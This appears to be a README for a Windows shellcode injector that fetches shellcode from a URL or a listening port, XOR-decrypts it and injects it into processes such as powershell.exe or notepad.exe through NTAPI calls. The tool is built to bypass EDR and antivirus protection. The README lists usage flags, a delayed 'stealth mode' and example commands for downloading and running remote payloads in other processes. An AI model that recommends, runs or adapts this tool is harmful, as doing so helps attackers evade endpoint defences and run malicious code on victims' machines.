Windows-NTAPI-Injector icon indicating copy to clipboard operation
Windows-NTAPI-Injector copied to clipboard

Inject shellcode to process using Windows NTAPI for bypassing EDRs and Antiviruses

Windows NTAPI shellcode injector

Inject shellcode from memory to process using Windows NTAPI for bypassing EDRs and Antiviruses

  • Download shellcode from URL
  • Listen and wait for shellcode


        Injector.exe -u <URL> [-k <xor_key>]
        Injector.exe -p <PID/Process Name> -u <URL> [-k <xor_key>]
        Injector.exe -p <PID/Process Name> -l <LISTEN_PORT> [-k <xor_key>]
        Injector.exe -h
        -h       Show this menu.
        -u       URL to donwload shellcode from (Not listen mode).
        -p       PID/Process name to be injected (Optional).
        -l       Listen mode port (Not download mode).
        -k       XOR key to use for decryption.
        -s       Stealth mode - the decryption and injection will start after given seconds (Default 18).
        -m       Injection mode - NT or normal(VirtualAllocEx, WriteProcessMemory, CreateRemoteThread).


Download and inject to powershell.exe

injector.exe -u -p powershell.exe

Wait for connection on port 8080, receive shellcode and inject to owned notepad.exe

injector.exe -l 8080